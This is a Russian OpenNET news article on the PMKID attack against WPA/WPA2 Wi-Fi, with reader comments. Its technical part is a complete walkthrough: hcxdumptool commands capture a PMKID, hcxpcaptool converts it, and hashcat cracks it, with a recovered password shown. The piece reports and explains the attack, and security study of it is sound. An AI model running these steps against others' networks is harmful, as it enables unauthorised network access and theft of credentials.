The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги | ]

12.08.2018 12:05  Новая техника атаки на беспроводные сети с WPA2

Йенс Штойбе (Jens "atom" Steube), создатель программы для подбора паролей hashcat, представил новую технику атаки на беспроводные сети с аутентификацией на базе механизмов WPA или WPA2. Предложенный метод существенно упрощает получение идентификатора, который затем может быть использован для подбора пароля подключения к беспроводной сети.

Атака применима к любым сетям 802.11i/p/q/r с включенным румингом (поддерживается на большинстве современных точек доступа). Суть метода в возможности получения идентификатора PMKID (Pairwise Master Key Identifier) в составе ответа EAPOL на запрос аутентификации (PMKID указывается в опциональном поле RSN IE (Robust Security Network Information Element)). Наличие PMKID позволяет определить разделяемый ключ PSK (Pre-Shared Key, пароль к беспроводной сети) без непосредственного получения вычисленного на его основе PMK (Pairwise Master Key), передаваемого на этапе согласования соединения при успешной аутентификации нового пользователя. В частности, PMKID вычисляется по формуле "HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)". Так как MAC-адреса и строка с названием сети изначально известны, не составляет труда применять PMKID вместо PMK в качестве признака успешного подбора пароля.

Атаки по подбору паролей на основе перехваченных кадров не новы, но в отличие от ранее применяемых методов новая атака не требует ожидания подключения к сети нового пользователя и сохранения всей активности, связанной с установкой им соединения. Для получения данных, достаточных для начала подбора пароля, новый метод требует перехвата лишь одного кадра, который можно получить в любое время, отправив запрос аутентификации к точке доступа. Подобная особенность существенно упрощает получение данных для начала подбора, но в целом успешность атаки как и раньше зависит от стойкости установленного пароля к подбору по словарю.

Отмечается, что большинство пользователей не утруждают себя установкой стойких к подбору паролей подключения к беспроводной сети или используют генерируемые точкой доступа пароли, которые на первый взгляд являются стойкими, но на деле формируются на основе предсказуемых шаблонов. Подобные пароли достаточно эффективно подбираются при знании информации о производителе точки доступа, которую можно получить, например, проанализировав MAC-адрес и ESSID. Время подбора подобных 10-символьных паролей оценивается примерно в 8 дней на системе с 4 GPU.

Для проведения атаки требуются свежие версии hcxdumptool, hcxtools и hashcat.

Запускаем hcxdumptool, отправляем запрос к точке доступа для получения PMKID и сохраняем результат в файл в формате pcapng


   ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

    start capturing (stop with ctrl+c)
    INTERFACE:...............: wlp39s0f3u4u5
    FILTERLIST...............: 0 entries
    MAC CLIENT...............: 89acf0e761f4 (client)
    MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
    EAPOL TIMEOUT............: 20000
    DEAUTHENTICATIONINTERVALL: 10 beacons
    GIVE UP DEAUTHENTICATIONS: 20 tries
    REPLAYCOUNTER............: 62083
    .... 
    [13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e  [ASSOCIATIONREQUEST, SEQUENCE 4]
    [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
    [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]

В случае если точка доступа поддерживает отправку PMKID будет выведено сообщение "FOUND PMKID". Из-за помех перехват может не получиться с первого раза, поэтому рекомендуется запускать hcxdumptool в течение приблизительно 10 минут.

Запускаем утилиту hcxpcaptool для преобразования перехваченного дампа из формата pcapng в формат для разбора в hashcat.


   ./hcxpcaptool -z test.16800 test.pcapng

    start reading from test.pcapng

    summary:
    --------
    file name....................: test.pcapng
    file type....................: pcapng 1.0
    file hardware information....: x86_64
    file os information..........: Linux 4.17.11-arch1
    file application information.: hcxdumptool 4.2.0
    network type.................: DLT_IEEE802_11_RADIO (127)
    endianess....................: little endian
    read errors..................: flawless
    packets inside...............: 66
    skipped packets..............: 0
    packets with FCS.............: 0
    beacons (with ESSID inside)..: 17
    probe requests...............: 1
    probe responses..............: 11
    association requests.........: 5
    association responses........: 5
    authentications (OPEN SYSTEM): 13
    authentications (BROADCOM)...: 1
    EAPOL packets................: 14
    EAPOL PMKIDs.................: 1

    1 PMKID(s) written to test.16800

Содержимое записанного файла включает строки вида "2582a81d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465af3a", которые содержат шестнадцатеричные значения PMKID, MAC AP,MAC Station и ESSID.

Дополнительно при запуске hcxpcaptool можно использовать опции "-E", "-I" и '-U" для анализа наличия паролей, идентификаторов и имён пользователей в беспроводном трафике:


   ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

Запускаем hashcat для подбора пароля (применяется режим 16800):


   ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

    hashcat (v4.2.0) starting...

    OpenCL Platform #1: NVIDIA Corporation
    ======================================
    * Device #1: GeForce GTX 1080, 2028/8112 MB allocatable, 20MCU
    * Device #2: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
    * Device #3: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
    * Device #4: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU

    Hashes: 1 digests; 1 unique digests, 1 unique salts
    Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

    Applicable optimizers:
    * Zero-Byte
    * Single-Hash
    * Single-Salt
    * Brute-Force
    * Slow-Hash-SIMD-LOOP

    Minimum password length supported by kernel: 8
    Maximum password length supported by kernel: 63

    Watchdog: Temperature abort trigger set to 90c

    2582573161c61*4604d4e*89acf0e761f4*ed4824639f3a:hashcat!

    Session..........: hashcat
    Status...........: Cracked
    Hash.Type........: WPA-PMKID-PBKDF2
    Hash.Target......: 2582a8281d0e61c61*4604ba734d4e*89acf...a39f3a
    Time.Started.....: Sun Aug 12 12:51:38 2018 (41 secs)
    Time.Estimated...: Sun Aug 12 12:52:19 2018 (0 secs)
    Guess.Mask.......: ?l?l?l?l?l?lt! [8]
    Guess.Queue......: 1/1 (100.00%)
    Speed.Dev.#1.....:   408.9 kH/s (103.86ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#2.....:   408.6 kH/s (104.90ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#3.....:   412.9 kH/s (102.50ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#4.....:   410.9 kH/s (104.66ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#*.....:  1641.3 kH/s
    Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
    Progress.........: 66846720/308915776 (21.64%)
    Rejected.........: 0/66846720 (0.00%)
    Restore.Point....: 0/11881376 (0.00%)
    Candidates.#1....: hariert! -> hhzkzet!
    Candidates.#2....: hdtivst! -> hzxkbnt!
    Candidates.#3....: gnxpwet! -> gwqivst!
    Candidates.#4....: gxhcddt! -> grjmrut!
    HWMon.Dev.#1.....: Temp: 81c Fan: 54% Util: 75% Core:1771MHz Mem:4513MHz Bus:1
    HWMon.Dev.#2.....: Temp: 81c Fan: 54% Util:100% Core:1607MHz Mem:4513MHz Bus:1
    HWMon.Dev.#3.....: Temp: 81c Fan: 54% Util: 94% Core:1683MHz Mem:4513MHz Bus:1
    HWMon.Dev.#4.....: Temp: 81c Fan: 54% Util: 93% Core:1620MHz Mem:4513MHz Bus:1




  1. Главная ссылка к новости (https://medium.com/@billbuchan...)
  2. OpenNews: Программа подбора паролей hashcat стала открытой
  3. OpenNews: OpenBSD отключает WEP и WPA1 по умолчанию
  4. OpenNews: Атака против WPA2, позволяющая перехватить трафик в WiFi-сети
  5. OpenNews: Опубликована технология защиты беспроводных сетей WPA3
  6. Проверка безопасности беспроводной сети WPA/WPA2 при помощи Aircrack-ng и Hashcat
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: wpa, wpa2, wifi
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение Ajax/Линейный | Раскрыть все сообщения | RSS
 
  • 1.1, Аноним (1), 13:18, 12/08/2018 [ответить] [показать ветку] [···]    [к модератору]
  • –4 +/
    боюсь денег потраченных на 4х GeForce GTX 1080 хватит на оплату интернета на 15 лет как минимум. если вы поняли о чем я :)
     
     
  • 2.2, Аноним (2), 13:27, 12/08/2018 [^] [ответить]    [к модератору]
  • –1 +/
    Да глючная точка доступа явно дешевле, чем 4•1080
     
  • 2.4, angra (ok), 13:33, 12/08/2018 [^] [ответить]    [к модератору]
  • +14 +/
    А если атакующий не мамкин хацкер и цель не халявный интернет, а ресурсы внутренней сети фирмы?
     
     
  • 3.12, Аноним (12), 14:25, 12/08/2018 [^] [ответить]    [к модератору]
  • +5 +/
    Это ж какие кретины во внутреннюю сеть с ценными данными по вайфаю пускают ?
     
     
  • 4.15, 123 (??), 14:35, 12/08/2018 [^] [ответить]    [к модератору]
  • +1 +/
    Русский бизнес.
     
     
  • 5.18, Я (??), 15:03, 12/08/2018 [^] [ответить]     [к модератору]  
  • +5 +/
    Или мамкин админ, который на аутсорсе херачит по быстренькой, чтобы бабла слов... весь текст скрыт [показать]
     
  • 4.17, Аноним (17), 14:45, 12/08/2018 [^] [ответить]     [к модератору]  
  • +/
    Все у кого есть удаленный доступ Так как нет способа проверить, вот этот хост с... весь текст скрыт [показать]
     
  • 4.19, Crazy Alex (ok), 15:05, 12/08/2018 [^] [ответить]    [к модератору]  
  • +2 +/
    Каждый первый примерно. Каждый второй - уж точно.Ноутбуки, смартфоны у всех.
     
     
  • 5.29, angra (ok), 18:18, 12/08/2018 [^] [ответить]    [к модератору]  
  • +12 +/
    Верно подмечено. Добавлю еще кучу устройств вроде переносных сканеров штрихкодов.
    А вот мамкины хацкеры живут в выдуманном мире, где офис каждой второй фирмы имеет защиту уровня правительственного бункера, а все остальные за серьезные конторы не считаются. Ничего, закончат школу, устроятся на работу и перед ними разверзнуться бездны. Окажется, что "правильно" не делают почти нигде и никогда.
     
     
  • 6.38, Maxim (??), 23:59, 12/08/2018 [^] [ответить]     [к модератору]  
  • –3 +/
    Подтверждаю Поэтому у нас 3 сети Одна в которой есть доступ ко внутренним ресур... весь текст скрыт [показать]
     
     
  • 7.40, Аноним (40), 04:03, 13/08/2018 [^] [ответить]    [к модератору]  
  • +10 +/
    Записанные на бумажке приклеенной к монитору...
     
  • 7.50, _ (??), 10:41, 13/08/2018 [^] [ответить]    [к модератору]  
  • +/
    RADIUS, не не слышал
     
  • 4.46, Андрей (??), 08:54, 13/08/2018 [^] [ответить]     [к модератору]  
  • +/
    Я скажу даже больше порой данные не такие уже и ценные Ну сломаете вы wifi внут... весь текст скрыт [показать]
     
     
  • 5.57, Аноним (57), 11:46, 14/08/2018 [^] [ответить]    [к модератору]  
  • +/
    А если wifi подключен к системе управления тэц?
     
     
  • 6.59, Андрей (??), 15:52, 14/08/2018 [^] [ответить]     [к модератору]  
  • +/
    И чо Вы были хоть раз на более-менее крупной тэц Много там вайфая подключенног... весь текст скрыт [показать]
     
     
  • 7.62, Аноним (62), 21:41, 14/08/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    > Работать надо, а не интернеты читать!

    А вы в таком случае что тут делаете?

     
  • 7.63, Аноним (57), 00:07, 15/08/2018 [^] [ответить]    [к модератору]  
  • +/
    А я почему вопрос задал, так просто что-ли?) И давайте не меряться стажем в энергетике - он у меня немного побольше вашего будет.
     
  • 5.68, Аноним (-), 20:37, 20/08/2018 [^] [ответить]     [к модератору]  
  • +/
    Конкуренты с удовольствием заплатят за возможность вешать прямо через внутреннюю... весь текст скрыт [показать]
     
  • 4.60, Аноним (60), 20:14, 14/08/2018 [^] [ответить]     [к модератору]  
  • +/
    Например, те, чьё начальство арендовало кусок фойе бизнес-центра под стойку ресе... весь текст скрыт [показать]
     
  • 4.65, это что никнеймы теперь нужны аааа (?), 07:49, 16/08/2018 [^] [ответить]     [к модератору]  
  • +/
    Много кто В качестве примера можно привести одного известного вендора, в россий... весь текст скрыт [показать]
     
  • 3.16, Я (??), 14:45, 12/08/2018 [^] [ответить]     [к модератору]  
  • +/
    Наверное, точки доступа компании должны быть изолированы от внутренней сети Ну,... весь текст скрыт [показать]
     
     
  • 4.27, angra (ok), 18:06, 12/08/2018 [^] [ответить]     [к модератору]  
  • +5 +/
    Для начала попробуй объяснить элекромагнитным волнам, что они должны не выходить... весь текст скрыт [показать]
     
  • 4.42, Аноним (42), 07:28, 13/08/2018 [^] [ответить]    [к модератору]  
  • +/
    >Замки от добры людей - злых они не остановят.

    Гугл - корпорация добра, кстати.

     
     
  • 5.45, ыы (?), 07:56, 13/08/2018 [^] [ответить]    [к модератору]  
  • +/
    поэтому ее зонды не раздражают, а доставляют наслаждение....
     
  • 2.14, Аноним (17), 14:27, 12/08/2018 [^] [ответить]     [к модератору]  
  • +/
    Поняли Ты считаешь, что получение чужой учетки для доступа в сеть, нужно для до... весь текст скрыт [показать]
     
  • 2.49, Ivan (??), 10:20, 13/08/2018 [^] [ответить]     [к модератору]  
  • +1 +/
    Зная точку доступа человека, на которого точишь зуб, можно с его точки, где ни б... весь текст скрыт [показать]
     
  • 1.3, Аноним (3), 13:31, 12/08/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +6 +/
    Прям странно видеть, что анонимам нужно объяснять, зачем ви-фи ломают... Уж точно не для того, чтобы в ВКшечке за чужой счёт сидеть.
     
     
  • 2.10, Андрей (??), 14:15, 12/08/2018 [^] [ответить]     [к модератору]  
  • +1 +/
    у блин, к тупому бедному соседу Васяну приедет пативен из за того,что соседский ... весь текст скрыт [показать]
     
     
  • 3.21, Аноним (21), 16:23, 12/08/2018 [^] [ответить]    [к модератору]  
  • +7 +/
    Васян сам за это проголосовал
     
     
  • 4.23, threescarth (ok), 16:54, 12/08/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    Тут речь о том Васяне, который как раз таки за это и не голосовал
     
     
  • 5.52, Аноним (52), 20:14, 13/08/2018 [^] [ответить]     [к модератору]  
  • +1 +/
    Ну может и не голосовал, но молчаливо согласился Суть от этого не меняется Но ... весь текст скрыт [показать]
     
  • 2.33, Аноним (33), 19:06, 12/08/2018 [^] [ответить]    [к модератору]  
  • +/
    Мисион импосибл какой оо прям лол
     
  • 1.5, iPony (?), 13:37, 12/08/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • –2 +/
    А в WPA3 не прокатит?
     
  • 1.13, AnonPlus (?), 14:26, 12/08/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • –1 +/
    В общем, если раньше надо было запустить пару команд в консоли, чтобы послать deauth подключённому пользователю, то теперь не нужно.

    Я правильно понимаю, что это вся разница? Так deauth послать вовсе нетрудно. У кого из домашних пользователей включена защита от деаутентификации, поднимите руки?

     
     
  • 2.22, Аноним (22), 16:25, 12/08/2018 [^] [ответить]     [к модератору]  
  • +1 +/
    802 11w который в том числе защищает от deauth в openwrt есть давно и у меня дав... весь текст скрыт [показать]
     
     
  • 3.64, AnonPlus (?), 19:27, 15/08/2018 [^] [ответить]    [к модератору]  
  • +/
    >> в openwrt есть давно

    Давайте различать "в openwrt" и "в драйвере". В openwrt есть драйверы, в которых этого нет

     
  • 1.20, Аноним (20), 15:35, 12/08/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Как насчёт eap-tls?
     
     
  • 2.41, Аноним (41), 07:26, 13/08/2018 [^] [ответить]    [к модератору]  
  • +/
    Тоже интересно.

    Мимо-шизик с wpa-eap дома.

     
     
  • 3.56, Аноним (-), 10:19, 14/08/2018 [^] [ответить]    [к модератору]  
  • +/
    Ты ещё небось и руки моешь перед едой? Точно шизик!
     
  • 1.24, Аноним (33), 17:25, 12/08/2018 [ответить] [показать ветку] [···]     [к модератору]  
  • –3 +/
    Если компания маломальски серьёзная то макии используемых устройств будут в базе... весь текст скрыт [показать]
     
     
  • 2.28, angra (ok), 18:11, 12/08/2018 [^] [ответить]     [к модератору]  
  • +/
    Ну да, MAC ведь ну никак нельзя подделать Это запрещает религия тех, кто доступ... весь текст скрыт [показать]
     
     
  • 3.31, Аноним (33), 18:56, 12/08/2018 [^] [ответить]     [к модератору]  
  • +1 +/
    Заходим в компанию связанную с военкой или другую подобную где участвует гостайн... весь текст скрыт [показать]
     
  • 3.37, Аноним (33), 23:33, 12/08/2018 [^] [ответить]    [к модератору]  
  • +/
    А MAC где брать прикажете? Или надо для начала украсть у кого то ноутбук или планшет?
     
     
  • 4.39, Аноним (22), 02:33, 13/08/2018 [^] [ответить]     [к модератору]  
  • +4 +/
    Для Wi-Fi сети MAC адрес идёт в пакетах без шифрования в не зависимости от того ... весь текст скрыт [показать]
     
  • 4.47, Evgeny (??), 09:20, 13/08/2018 [^] [ответить]    [к модератору]  
  • +/
    Введите команду arp.
     
  • 2.30, ыы (?), 18:30, 12/08/2018 [^] [ответить]    [к модератору]  
  • +2 +/
    >Ну и появление нового устройства в арп листе должно заставить охрану начать суетится.

    Колонка воскресного юмора :)

     
  • 2.51, soarin (ok), 14:55, 13/08/2018 [^] [ответить]    [к модератору]  
  • +/
    > Если компания маломальски серьёзная то макии используемых устройств будут в базе(кого подключать а кого нет)

    🛋

     
  • 2.66, А (??), 23:36, 17/08/2018 [^] [ответить]    [к модератору]  
  • +/
    Странный критерий сереьзности компании.

    Как раз в серьезной количество станций в wifi сети больше 2-3 десятков, и сопровождать базу их MAC-ов просто неудобно.

    А вот EAP нормально приготовленный - это вполне себе признак. При этом, как на wifi разведённый, так и на проводных портах уровня доступа.

     
  • 1.25, Аноним (25), 17:54, 12/08/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Вообще-то перевод hcxdumptool wifi устройство должно быть переведено в режим monitor.
     
     
  • 2.26, Аноним (25), 17:55, 12/08/2018 [^] [ответить]    [к модератору]  
  • –2 +/
    А так норм перепечатка с хабра угу.
     
  • 1.32, Аноним (33), 19:00, 12/08/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +1 +/
    Реально какой лошара будет такое делать?
     
  • 1.34, имя (?), 20:23, 12/08/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    ломайте, я даже дам подсказку -- 26 символов.
     
     
  • 2.44, КО (?), 07:50, 13/08/2018 [^] [ответить]    [к модератору]  
  • +2 +/
    А хеш от него какой длины хранится? А то, если 128 бит, то наверное, в пределах 16 символов есть коллизия, которая покороче ваших 26, а для входа тоже прокатывает. Но Вы про нее не знаете. :)
     
     
  • 3.48, имя (?), 09:29, 13/08/2018 [^] [ответить]    [к модератору]  
  • +/
    Хороший вопрос. Используется aes ccm и tkip, вроде оба 128 бит?
    Однако, 16 символов тоже не мало..
     
  • 1.35, Аноним (35), 22:57, 12/08/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • –1 +/
    М-да... После новости задумался, и от греха подальше поставил на точку whitelist MAC адресов и пароль усложнил.
     
     
  • 2.43, ыы (?), 07:42, 13/08/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    >М-да... После новости задумался, и от греха подальше

    Как в анекдоте -
    "
    Век живи - век учись, подумал он и переложил серебряный портсигар из кармана брюк в нагрудный...
    "

    >поставил на точку whitelist MAC адресов и пароль усложнил.

    whitelist MAC адресов не является защитой.
    усложнение пароля - защита весьма условная...

     
  • 1.36, Аноним (36), 23:29, 12/08/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • –3 +/
    > Время подбора подобных 10-символьных паролей оценивается примерно в 8 дней на системе с 4 GPU.

    Ну пусть попробует подобрать мой 32х-символьный - удачи, чо.

     
     
  • 2.53, Аноним (52), 20:16, 13/08/2018 [^] [ответить]    [к модератору]  
  • +/
    Я бы подобрал, спасибо Амазону за аренду GPU по низким ценам. Но у тебя же нет ничего интересного. А даже если и есть, то проще бейсбольной битой по голени и ты сам всё расскажешь.
     
     
  • 3.54, др. Аноним (?), 21:46, 13/08/2018 [^] [ответить]    [к модератору]  
  • +/
    >> 32х-символьный
    > Я бы подобрал, спасибо Амазону за аренду GPU по низким ценам.
    > Но

    Но прогуливать математику-комбинаторику не следовало. Тогда бы мог прикинуть, с какой скоростью нужно перебирать 32^32/2 комбинаций, чтобы подобрать за приемлимое время.

    > проще бейсбольной битой по голени и ты сам всё расскажешь.

    С голой битой против лома? Ох уж эти теоретики …

     
     
  • 4.58, КО (?), 15:01, 14/08/2018 [^] [ответить]    [к модератору]  
  • +/
    Ну вот еще, зачем так много. Достаточно подобрать любой длины, который будет генерить тот же хеш.
    Учитывая, что хеш гораздо короче, там может коллизия с паролем типа "1" будет.
     
  • 4.67, terrs (??), 18:56, 18/08/2018 [^] [ответить]    [к модератору]  
  • +/
    + SS ^)
     
  • 1.55, Аноним (55), 09:01, 14/08/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    новость нулевой пользы
     
     
  • 2.61, Аноним (61), 21:34, 14/08/2018 [^] [ответить]    [к модератору]  
  • +/
    Как и комментарии к новости. Делай выводы.
     

     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:


      Закладки на сайте
      Проследить за страницей
    Created 1996-2018 by Maxim Chirkov  
    ДобавитьПоддержатьВебмастеруГИД  
    Hosting by Ihor